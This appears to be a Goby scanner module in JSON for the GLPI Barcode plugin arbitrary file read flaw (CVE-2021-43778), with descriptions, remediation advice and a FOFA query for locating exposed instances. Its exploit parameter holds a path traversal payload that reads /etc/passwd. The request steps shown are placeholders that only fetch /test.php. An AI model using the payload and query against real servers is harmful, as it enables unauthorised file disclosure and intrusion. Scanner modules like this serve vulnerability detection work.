Goby/json/GLPI-Barcode-Arbitrary-File...

147 lines
5.5 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "GLPI Barcode Arbitrary File Read(CVE-2021-43778)",
"Description": "<p>Teclib GLPI is a set of IT asset management solutions.</p><p>The GLPI Barcode plug-in version between v2.x-2.61 has arbitrary file reading vulnerabilities. Attackers can inject ../ to read all readable files on the affected device to further take over the system.</p>",
"Product": "GLPI",
"Homepage": "https://glpi-project.org",
"DisclosureDate": "2021-11-29",
"Author": "1291904552@qq.com",
"FofaQuery": "app=\"TECLIB-GLPI\" || title=\"GLPI\"",
"GobyQuery": "app=\"TECLIB-GLPI\" || title=\"GLPI\"",
"Level": "2",
"Impact": "<p>The GLPI Barcode plug-in version between v2.x-2.61 has arbitrary file reading vulnerabilities. Attackers can inject ../ to read all readable files on the affected device to further take over the system.</p>",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9\">https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2. If not necessary, prohibit public network access to the system.</p>",
"Translation": {
"CN": {
"Name": "GLPI 资产管理系统 Barcode 插件存在任意文件读取漏洞CVE-2021-43778",
"VulType": [
"文件读取"
],
"Tags": [
"文件读取"
],
"Description": "<p>Teclib GLPI是一套IT资产管理解决方案。</p><p>GLPI Barcode 插件 v2.x-2.61之间的版本存在任意文件读取漏洞,攻击者可以注入../来读取受影响设备上的所有可读文件进一步接管系统。</p>",
"Impact": "<p>GLPI Barcode 插件 v2.x-2.61之间的版本存在任意文件读取漏洞,攻击者可以注入../来读取受影响设备上的所有可读文件进一步接管系统。</p>",
"Product": "GLPI",
"Recommendation": "<p>⼚商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9\">https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9</a></p><p>1、通过防⽕墙等安全设备设置访问策略设置⽩名单访问。</p><p>2、如⾮必要禁⽌公⽹访问该系统。</p>"
},
"EN": {
"Name": "GLPI Barcode Arbitrary File Read(CVE-2021-43778)",
"VulType": [
"fileread"
],
"Tags": [
"fileread"
],
"Description": "<p>Teclib GLPI is a set of IT asset management solutions.</p><p>The GLPI Barcode plug-in version between v2.x-2.61 has arbitrary file reading vulnerabilities. Attackers can inject ../ to read all readable files on the affected device to further take over the system.</p>",
"Impact": "<p>The GLPI Barcode plug-in version between v2.x-2.61 has arbitrary file reading vulnerabilities. Attackers can inject ../ to read all readable files on the affected device to further take over the system.</p>",
"Product": "GLPI",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9\">https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>"
}
},
"References": [
"https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9"
],
"HasExp": true,
"ExpParams": [
{
"name": "filepath",
"type": "input",
"value": "../../../../../../../etc/passwd"
}
],
"ExpTips": null,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"fileread"
],
"VulType": [
"fileread"
],
"CVEIDs": [
"CVE-2021-43778"
],
"CVSSScore": "9.8",
"AttackSurfaces": {
"Application": [
"GLPI"
],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"CNNVD": [
"CNNVD-202111-2089"
],
"CNVD": [
""
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Is0day": false
}